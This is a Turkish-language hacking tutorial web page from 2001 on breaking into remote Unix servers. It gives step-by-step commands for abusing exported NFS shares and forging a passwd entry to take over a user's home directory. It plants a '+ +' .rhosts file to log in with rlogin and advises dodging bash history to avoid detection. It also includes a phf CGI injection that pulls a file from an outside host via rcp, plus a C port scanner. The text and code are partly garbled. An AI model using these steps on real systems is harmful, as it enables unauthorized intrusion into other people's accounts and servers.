ACCESS ALMAKline.gif (4491 bytes)   Bunun için eski bir yöntem kullanacağız  bağlandığınızz serverların export dosyaları
na ulasip kendimizi user olarak tanitacagiz.(bizim promptumuz hacker)

                          hacker:~/usr/sbin/showmount -e <adres veya ip     ENTER
                          RPC: Program not registered.

    E?er   "RPC: Program not registered." satyry belirirse bilinki sistemde bu tip bir
security hole bulunmuyor ki bu oran %70 tir ba?ka bi yol deniicez demektir.
    Neyse biz durumun a?a?daki gibi oldu?unu farzedip devam edelim
 

                            hacker:~/usr/sbin/showmount -e <adres veya ip>    ENTER
                            /usr   adress.com
                            /home
                            /cdrom

     Iste yakaladik   bu üstte çikanlar ulasabilecegimiz directoryler hehehe simdi de sunlary yazyn:

         hacker:~mkdir /tmp/mount           ENTER
         hacker:~/bin/mount -nt nfs <adres veya ip:/home /tmp/mount/   ENTER
 
 

     Bu komutlarla dosyalari çekmedik ok? sadece sistemimize mount ettik(cd rom gibi)
devam edelim ve simdi directory de ne var bi bakalim

                        hacker:~ls -sal /tmp/mount       ENTER(ENT)
 
 
 

   total 9
  1 drwxrwxr-x   8 root     root          1024 Jul  4 20:34 ./
    1 drwxr-xr-x  19 root     root          1024 Oct  8 13:42 ../
        1 drwxr-xr-x   3 at1       users        1024 Jun 22 19:18 at1/
    1 dr-xr-xr-x   8 ftp      wheel         1024 Jul 12 14:20 ftp/
            1 drwxrx-r-x    3 kerim     100           1024 Jul  6 13:42 kerim/
             1 drwxrx-r-x    3 139      100           1024 Sep 15 12:24 zeynep/
        1 -rw-------   1 root      root          242 Mar  9  1997 sudoers
   1 drwx------   3 test     100           1024 Oct  8 21:05 test/
           1 drwx------  15 102       100           1024 Oct 20 18:57 coskun/

 
 
 
 

    Diyelim böyle bi liste aldik ?imdi "coskun" unun home unu hack edelim :))...

                       hacker:~id     ENT
                       uid=0 euid=0
                       hacker:~whoami    ENT
                       root
                       hacker:~echo "coskun::102:2::/tmp/mount:/bin/csh" /etc/passwd ENT

    (Ileri derecede bilenler için:burda /bin/csh yerine bash ta kullana bilirdik ama remote server üstünde .bash_history  diye bi dosya yaratir ve silmeyi unutursak  kendimizi ele veririz)...devam edelim,

                               hacker:~su - coskun     ENT
                               hacker:~ls -lsa /tmp/mount/   ENT

                    total 9
   1 drwxrwxr-x   8 root     root          1024 Jul  4 20:34 ./
   1 drwxr-xr-x  19 root     root          1024 Oct  8 13:42 ../
   1 drwxr-xr-x   3 at1      users         1024 Jun 22 19:18 at1/
   1 dr-xr-xr-x   8 ftp      wheel         1024 Jul 12 14:20 ftp/
   1 drwxrx-r-x   3 kerim     100           1024 Jul  6 13:42 kerim/
   1 drwxrx-r-x   3 139      100           1024 Sep 15 12:24 zeynep/
   1 -rw-------   1 root     root           242 Mar  9  1997 sudoers
   1 drwx------   3 test     100           1024 Oct  8 21:05 test/
   1 drwx------  15 coskun   daemon        1024 Oct 20 18:57 coskun/

    Hehehe bööölece co?kun karde?imin home directory sine sahip oluruuuz ve artyk
login zamany!!!

             hacker:~echo "+ +" coskun/.rhosts
             hacker:~cd /
             hacker:~rlogin <adres veya ip
             Welcome to adres.com
             SunOs ver3.02....vs
             adres:~$

      Bakyn prompta $. Ne demek bu??? biz artyk  bu serverim bi useriyiiiz tebrikler  :)
i?te size access en azyndan user siniz (root soora biraz C++ bilgisiyle beraber)

      Ama daha öncede bahsetti?im gibi bu tip bir security hole ihtimali zayyftyr yylmadan
denemelisiniz



      Bir ba?ka yöntem ise serverin  80. portunun açyk olup olmady?yna ba?ly olan dyr ki
web sayfasy olan serverlar genelde bu portlaryny açyk tutarlar...

 

 hacker:~echo "+ +" /tmp/rhosts     ENT

mysite:~echo "GET /cgi-bin/phf?Qalias=x%0arcp+kafka@hacker.com:/tmp/rhosts+
/root/.rhosts" | nc -v - 20 <adres veya ip 80      ENT



     Yada  ba?ka portlaryn açyk olup olmady?yndan ?üpheniz varsa a?a?idaki prg ile bunu
ara?tyrmak mümkün.Program vi editörü ile yazylmy?, "worldhacker" tarafyndan ama
versiyon uyumsuzluklary var ne yazykki....
 

 

/* -*-C-*- tcpprobe.c */
/* tcpprobe - report on which tcp ports accept connections */
/* IO ERROR, error@axs.net, Sep 15, 1995 */

#include <stdio.h
#include <sys/socket.h
#include <netinet/in.h
#include <errno.h
#include <netdb.h
#include <signal.h

int main(int argc, char **argv)
{
  int probeport = 0;
  struct hostent *host;
  int err, i, net;
  struct sockaddr_in sa;

  if (argc != 2) {
    printf("Usage: %s hostname\n", argv[0]);
    exit(1);
  }

  for (i = 1; i < 1024; i++) {
    strncpy((char *)&sa, "", sizeof sa);
    sa.sin_family = AF_INET;
    if (isdigit(*argv[1]))
      sa.sin_addr.s_addr = inet_addr(argv[1]);
    else if ((host = gethostbyname(argv[1])) != 0)
      strncpy((char *)&sa.sin_addr, (char *)host-h_addr, sizeof sa.sin_addr);
    else {
      herror(argv[1]);
      exit(2);
    }
    sa.sin_port = htons(i);
    net = socket(AF_INET, SOCK_STREAM, 0);
    if (net < 0) {
      perror("\nsocket");
      exit(2);
    }
    err = connect(net, (struct sockaddr *) &sa, sizeof sa);
    if (err < 0) {
      printf("%s %-5d %s\r", argv[1], i, strerror(errno));
      fflush(stdout);
    } else {
      printf("%s %-5d accepted.                                \n", argv[1], i);
      if (shutdown(net, 2) < 0) {
 perror("\nshutdown");
 exit(2);
      }
    }
    close(net);
  }
  printf("                                                                 \r");
  fflush(stdout);
  return (0);
}

  Bu  program  tcp baglanti portlarini arar ve bulur prg bitti?inde tcpprobe.c diye bir
file iniz olacak  !!xterm üzerinde yazip çalistirmayin!!nedenini bende bilmiyorum ama
erno larimizi bulamiyo hehehe:)))

line.gif (4491 bytes)

© 2001  STEALA ONLINEAll right Reserved. MaiL To: admin@steala.cjb.net